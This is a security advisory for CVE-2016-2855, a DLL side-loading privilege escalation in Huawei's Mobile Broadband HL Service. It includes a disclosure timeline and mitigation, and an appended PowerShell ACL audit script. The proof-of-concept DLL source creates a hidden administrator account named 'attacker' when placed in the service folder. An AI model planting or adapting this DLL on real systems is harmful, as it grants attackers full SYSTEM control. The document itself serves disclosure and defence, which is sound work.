Huawei Mobile Broadband HL Service 22.001.25.00.03 Local Privilege Escalation

Published: 12 May 2016 | Reported by: Florian Bogner | Type: packetstorm | Source: packetstormsecurity.com

Huawei Mobile Broadband HL Service Local Privilege Escalation, CVE-2016-2855, DLL Side Loading Vulnerability, Windows Service Vulnerabilit

Related

Reporter | Title | Published
Circl | CVE-2016-2855 | 15 May 2016 10:16
CNVD | Huawei 3G/LTE Local Privilege Vulnerability | 17 May 2016 00:00
CVE | CVE-2016-2855 | 23 May 2016 19:00
Cvelist | CVE-2016-2855 | 23 May 2016 19:00
EUVD | EUVD-2016-3928 | 7 Oct 2025 00:30
NVD | CVE-2016-2855 | 23 May 2016 19:59
OSV | CVE-2016-2855 | 23 May 2016 19:59
Prion | Code injection | 23 May 2016 19:59

`Huawei Mobile Broadband HL Service Local Privilege Escalation  
  
Metadata  
===================================================  
Release Date: 12-05-2016  
Author: Florian Bogner @ Kapsch BusinessCom AG (https://www.kapsch.net/kbc)  
Affected versions: up to the current 22.001.25.00.03 on x86 and x64  
Tested on: Windows 7 32 bit and 64 bit  
CVE : CVE-2016-2855  
URL: https://bogner.sh/2016/05/cve-2016-2855-huawei-mobile-broadband-hl-service-local-privilege-escalation/  
Video: https://youtu.be/MwtjE2PmEJU  
Vulnerability Status: Fixed  
  
Abstract  
===================================================  
The Windows service "Mobile Broadband HL Service", as installed by many (?) Huawei 3G/LTE modems, is vulnerable to a DLL side loading attack that allows normal unprivileged users to gain full SYSTEM access.  
  
Disclosure Timeline  
===================================================  
6.3.2016: Issue privately reported to Huawei  
6.3.2016: CVE number requested  
7.3.2016: MITRE assigned CVE-2016-2855  
14.3.2016: Huawei verified the issue and is working on a fix  
9.5.2016: Huawei informed me that the issue has been fixed in their latest release. However, it is up to the carriers to push the fix to the devices.  
  
Technical Details  
===================================================  
The service executable for the "Mobile Broadband HL Service" service is located in "C:\ProgramData\MobileBrServ". Because the file permissions of this folder allow normal users to add files, a malicious local attacker can drop a DLL named VERSION.dll into this folder. During the next boot, this DLL is loaded and executed as part of the service launch. This results in a Local Privilege Escalation because the service runs as LOCAL SYSTEM.  
  
Proof of Concept  
===================================================  
#include <process.h>  
  
/*   
To compile 32bit dll:  
cl.exe /D_USRDLL /D_WINDLL version.cpp /link /DLL /OUT:version.dll  
  
Put into C:\ProgramData\MobileBrServ and reboot your system -> a new user will be added  
*/  
  
/* export all required functions - use Dependency Walker to check what is needed */  
extern "C"  
{  
__declspec(dllexport) int GetFileVersionInfoA();  
__declspec(dllexport) int GetFileVersionInfoSizeA();  
__declspec(dllexport) int VerQueryValueA();  
}  
  
/*   
Implement DLLMain with common datatypes so we don't have to include windows.h.   
Otherwise this would cause several compile errors because of the already known but reexported functions.  
*/  
int DllMain(void* hinst, unsigned long* reason, void* reserved) {  
    system("cmd /c \"echo>%tmp%\\dll_loaded\""); // cmd /c "echo>%tmp%\dll_loaded"  
    system("net user attacker Batman42 /add");  
    system("net localgroup Administrators attacker /add");  
  
    return 0;  
}  
  
/* Implement stubs of our exports */  
int GetFileVersionInfoA() {  
    return 0;  
}  
  
int GetFileVersionInfoSizeA() {  
    return 0;  
}  
  
int VerQueryValueA() {  
    return 0;  
}  
  
Suggested Solution  
===================================================  
The correct solution to prevent this attack is to change the filesystem ACLs so that normal users are prohibited from creating files and directories within the C:\ProgramData\MobileBrServ folder.  
  
Workaround  
===================================================  
Until Huawei pushes a fix, the filesystem ACLs should be updated manually to prevent normal users from writing anything into the service directory (C:\ProgramData\MobileBrServ). This can be automated using icacls.exe.  
  
`
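
An added example, not part of the original advisory: a PowerShell audit of the service directory named above. It reports allow ACEs that give broad user groups create/write rights on the folder itself and inventories any DLLs found there. The default path comes from the advisory; the helper names and the icacls lines in the closing comments are this example's own assumptions, and PowerShell 3.0 or later is assumed.

```powershell
# Added example (not from the advisory). Requires PowerShell 3.0+.
param([string]$ServiceDir = 'C:\ProgramData\MobileBrServ')  # path from the advisory

# Well-known SIDs of groups that contain ordinary, unprivileged users.
$BroadSids = @{
    'S-1-1-0'      = 'Everyone'
    'S-1-5-11'     = 'Authenticated Users'
    'S-1-5-32-545' = 'BUILTIN\Users'
    'S-1-5-4'      = 'INTERACTIVE'
}
# CreateFiles (0x2), CreateDirectories (0x4), GENERIC_ALL, GENERIC_WRITE
$WriteMask = 0x2 -bor 0x4 -bor 0x10000000 -bor 0x40000000

function Get-UserWritableAce {   # hypothetical helper name
    param([Parameter(Mandatory)][string]$Path)
    $sidType     = [System.Security.Principal.SecurityIdentifier]
    $inheritOnly = [System.Security.AccessControl.PropagationFlags]::InheritOnly
    foreach ($ace in (Get-Acl -LiteralPath $Path).GetAccessRules($true, $true, $sidType)) {
        $sid = $ace.IdentityReference.Value
        if ($ace.AccessControlType -ne 'Allow')       { continue }
        if ($ace.PropagationFlags -band $inheritOnly) { continue }  # applies to children only
        if (-not $BroadSids.ContainsKey($sid))        { continue }
        if (-not ([int]$ace.FileSystemRights -band $WriteMask)) { continue }
        [pscustomobject]@{ Principal = $BroadSids[$sid]; Rights = $ace.FileSystemRights
                           Inherited = $ace.IsInherited }
    }
}

function Get-ServiceDirDll {     # hypothetical helper name
    param([Parameter(Mandatory)][string]$Path)
    Get-ChildItem -LiteralPath $Path -Filter *.dll -File | ForEach-Object {
        [pscustomobject]@{
            Name      = $_.Name
            Owner     = (Get-Acl -LiteralPath $_.FullName).Owner
            Signature = (Get-AuthenticodeSignature -LiteralPath $_.FullName).Status
            Created   = $_.CreationTimeUtc
        }
    }
}

if (Test-Path -LiteralPath $ServiceDir) {
    $weak = @(Get-UserWritableAce -Path $ServiceDir)
    $weak | Format-Table -AutoSize
    Get-ServiceDirDll -Path $ServiceDir | Format-Table -AutoSize   # a version.dll here is unexpected
    if ($weak.Count -gt 0) { Write-Warning "$ServiceDir is writable by unprivileged users" }
}
# One possible icacls workaround (elevated; assumes the service needs no user write access):
#   icacls "C:\ProgramData\MobileBrServ" /inheritance:r /grant:r "*S-1-5-18:(OI)(CI)F" "*S-1-5-32-544:(OI)(CI)F" "*S-1-5-32-545:(OI)(CI)RX"
#   icacls "C:\ProgramData\MobileBrServ" /remove:g "*S-1-1-0" "*S-1-5-11" "*S-1-5-4"
```

Run the audit again after changing the ACL; an empty first table means none of the listed groups can create files in the folder.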
